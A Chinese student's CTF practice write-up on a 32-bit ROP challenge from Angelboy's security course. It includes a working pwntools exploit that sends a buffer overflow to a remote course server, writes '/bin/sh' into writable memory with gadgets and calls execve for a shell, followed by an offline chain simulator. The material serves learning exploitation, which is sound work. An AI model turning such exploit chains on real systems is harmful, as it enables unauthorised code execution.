Angelboy PWN-6

This month our club invited frozenkp to lecture, so I have been practicing PWN lately.
This challenge is one Angelboy used in his NTU computer security course; the recording is on YouTube.
It is mainly 32-bit ROP. I'm not sure whether it still turns up in competitions these days.
Attack steps:
1. Find a writable (rw) region of memory and write "/bin/sh\x00" into it.
2. Set the registers and make the execve syscall.


####################################################################################################
# Solution at https://www.youtube.com/live/3vvYS09-IGA , around 59:00
# Notes:
#### Writing /bin/sh went wrong
#### Originally used the wrong gadget : 0x0807b301 : mov dword ptr [eax], edx ; ret
#### Should use this one: 0x0809a15d : mov dword ptr [edx], eax ; ret
#### I don't know what pwntools.flat can be used for... compressing the ROP chain?
#### I was sleepy and didn't notice that it only reads 100 bytes, which limits my ROP chain to 68 bytes
######################################################################  Wenyi Li , 2023/4/25 03:46

from pwn import *

context.arch = "i386"
r = remote('120.114.62.210', 2126)
#r = process('./simplerop')
#r = gdb.debug('./simplerop')
r.recvuntil(b'Your input :')

offset = 32                          # bytes from the start of the buffer to the saved return address

# Gadget addresses (static binary, no PIE). The p32() copies are only used by the old chain below.
pop_eax = p32(0x080bae06)
pop_eax_raw = 0x080bae06             # pop eax ; ret
pop_edx = 0x0806e82a                 # pop edx ; ret
pop_edx_ecx_ebx = p32(0x0806e850)
pop_edx_ecx_ebx_raw = 0x0806e850     # pop edx ; pop ecx ; pop ebx ; ret
syscall = p32(0x0806eeec)            # int 0x80 (old chain)
int80 = 0x080493e1                   # int 0x80
write = p32(0x0807b301)              # mov dword ptr [eax], edx ; ret  (wrong gadget, old chain only)
write_raw = 0x0809a15d               # mov dword ptr [edx], eax ; ret
memory = 0x80e9300                   # writable address that receives "/bin/sh\x00"

ropchain = b''
rop = b''
# Step 1: write "/bin/sh\x00" to memory, 4 bytes per store: edx = destination, eax = data, [edx] = eax
rop += flat([pop_edx, memory, pop_eax_raw, b'/bin', write_raw])
rop += flat([pop_edx, memory + 4, pop_eax_raw, b'/sh\x00', write_raw])
# Step 2: execve("/bin/sh", NULL, NULL): edx = envp = 0, ecx = argv = 0, ebx = path, eax = 11
rop += flat([pop_edx_ecx_ebx_raw, 0, 0, memory, pop_eax_raw, 0xb, int80])
print(len(rop))                      # 68 bytes, so offset + chain fits in the 100-byte read

"""The earlier chain: too long for the 100-byte read, and built on the wrong write-where gadget
# Write '/bin/sh\x00' at memory (0x80e9300)
ropchain += pop_edx_ecx_ebx
ropchain += p32(0x6e69622f) # '/bin' -> edx
ropchain += p32(0xdead005) # garbage -> ecx
ropchain += p32(0xdead006) # garbage -> ebx
ropchain += pop_eax
ropchain += p32(memory)
ropchain += write          # mov [eax], edx

ropchain += pop_edx_ecx_ebx
ropchain += p32(0x68732f2f) # '//sh' -> edx
ropchain += p32(0xdead0001) # garbage -> ecx
ropchain += p32(0xdead002) # garbage -> ebx
ropchain += pop_eax
ropchain += p32(memory + 4)
ropchain += write

# cleanup
#ropchain += p32(0x08054250) # xor eax;ret

ropchain += pop_edx_ecx_ebx
ropchain += p32(0) # NUL terminator -> edx
ropchain += p32(0) # garbage -> ecx
ropchain += p32(memory) # ebx = path
ropchain += pop_eax
ropchain += p32(memory + 8)
ropchain += write

# Set registers and do the syscall
ropchain += pop_eax
ropchain += p32(11)
#ropchain += pop_edx_ecx_ebx
#ropchain += p32(0)
#ropchain += p32(0)
#ropchain += p32(memory)
ropchain += syscall

print(len(ropchain))
"""
payload = (b'A' * offset) + rop      # 32 bytes of padding, then the 68-byte chain
r.sendline(payload)

r.interactive()
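As an added example (not from the writeup or its script), the two attack steps above are rebuilt with a plain-Python stand-in for pwntools' flat() and then dry-run against a small model of the gadgets, so the chain can be checked offline before it is sent: that it fits the 68-byte budget, that every store lands inside writable memory, and what execve() ends up seeing in ebx/ecx/edx. flat() is not compression: it packs each integer as a word of context.bits bits in the context endianness and concatenates the result with any bytes in the list; the stand-in here only handles ints and bytes, whereas the real one also flattens nested lists and dicts. Gadget addresses, the scratch address and the 100-byte limit come from the script; the rw window (one page around 0x080e9300) and the gadget semantics table are assumptions made for the dry run. The example also shows why the store gadget and the pop order have to agree: pairing the final chain's pop edx / pop eax layout with mov [eax], edx sends the store to 0x6e69622f, the bytes of '/bin' read as an address.

```python
import struct

# Gadget addresses, scratch address and input budget are taken from the writeup's script.
POP_EAX = 0x080bae06            # pop eax ; ret
POP_EDX = 0x0806e82a            # pop edx ; ret
POP_EDX_ECX_EBX = 0x0806e850    # pop edx ; pop ecx ; pop ebx ; ret
MOV_EDX_EAX = 0x0809a15d        # mov dword ptr [edx], eax ; ret  (used by the final chain)
MOV_EAX_EDX = 0x0807b301        # mov dword ptr [eax], edx ; ret  (the gadget first tried)
INT80 = 0x080493e1              # int 0x80
SCRATCH = 0x080e9300            # rw address that receives "/bin/sh\x00"
BUDGET = 100 - 32               # read() takes 100 bytes, 32 of them are padding up to the return address
WRITABLE = range(0x080e9000, 0x080ea000)   # assumed rw page around SCRATCH (not taken from the binary)
SYS_EXECVE = 0xb

def flat(items):
    """Minimal stand-in for pwntools' flat(): every int becomes a 4-byte
    little-endian word, bytes are appended unchanged."""
    out = b''
    for item in items:
        out += struct.pack('<I', item) if isinstance(item, int) else item
    return out

def build_chain(store=MOV_EDX_EAX, scratch=SCRATCH):
    """Step 1: write "/bin/sh\\x00" into rw memory, 4 bytes per store gadget.
    Step 2: edx=envp=0, ecx=argv=0, ebx=path, eax=SYS_execve, int 0x80."""
    chain = flat([POP_EDX, scratch, POP_EAX, b'/bin', store])
    chain += flat([POP_EDX, scratch + 4, POP_EAX, b'/sh\x00', store])
    chain += flat([POP_EDX_ECX_EBX, 0, 0, scratch, POP_EAX, SYS_EXECVE, INT80])
    return chain

# What each gadget does to the machine state, keyed by its address (assumed semantics).
GADGETS = {
    POP_EAX: ('pop', ('eax',)),
    POP_EDX: ('pop', ('edx',)),
    POP_EDX_ECX_EBX: ('pop', ('edx', 'ecx', 'ebx')),
    MOV_EDX_EAX: ('store', 'edx', 'eax'),   # [edx] = eax
    MOV_EAX_EDX: ('store', 'eax', 'edx'),   # [eax] = edx
    INT80: ('syscall',),
}

def run_chain(chain):
    """Dry-run a chain word by word. Returns (regs, mem) at the int 0x80, or
    raises MemoryError for a store outside the rw window (a segfault for real)."""
    if len(chain) % 4:
        raise ValueError("chain is not word aligned")
    words = [struct.unpack('<I', chain[i:i + 4])[0] for i in range(0, len(chain), 4)]
    regs = {'eax': 0, 'ebx': 0, 'ecx': 0, 'edx': 0}
    mem = {}                       # address -> 4-byte word stored there
    pc = 0
    while pc < len(words):
        kind, *args = GADGETS.get(words[pc], ('unknown',))
        pc += 1
        if kind == 'pop':          # each pop consumes the next word of the chain
            for reg in args[0]:
                regs[reg] = words[pc]
                pc += 1
        elif kind == 'store':
            dst, src = regs[args[0]], regs[args[1]]
            if dst not in WRITABLE:
                raise MemoryError("store to 0x%08x, outside the rw window" % dst)
            mem[dst] = src
        elif kind == 'syscall':
            return regs, mem
        else:
            raise ValueError("0x%08x is not a gadget of this chain" % words[pc - 1])
    raise ValueError("chain ran out of words before int 0x80")

def cstring_at(mem, addr):
    """Read a NUL-terminated string from the simulated memory, 4 bytes at a time."""
    out = b''
    while True:
        word = struct.pack('<I', mem.get(addr, 0))
        if b'\x00' in word:
            return out + word.split(b'\x00', 1)[0]
        out += word
        addr += 4

def check_chain(chain):
    """Return (path, argv, envp, syscall number) as the kernel would see them, after the budget check."""
    if len(chain) > BUDGET:
        raise ValueError("chain is %d bytes, budget is %d" % (len(chain), BUDGET))
    regs, mem = run_chain(chain)
    return cstring_at(mem, regs['ebx']), regs['ecx'], regs['edx'], regs['eax']

def faults(store):
    """True if the chain built with this store gadget writes outside the rw window."""
    try:
        check_chain(build_chain(store=store))
        return False
    except MemoryError:
        return True

if __name__ == '__main__':
    good = build_chain()
    print(len(good), check_chain(good))                    # 68 (b'/bin/sh', 0, 0, 11)
    print("mov [eax], edx with this layout faults:", faults(MOV_EAX_EDX))
```

Run it before sending anything: a chain that returns (b'/bin/sh', 0, 0, 11) within the budget is the one worth sending, and a MemoryError here is the same bug that would show up as a SIGSEGV under gdb.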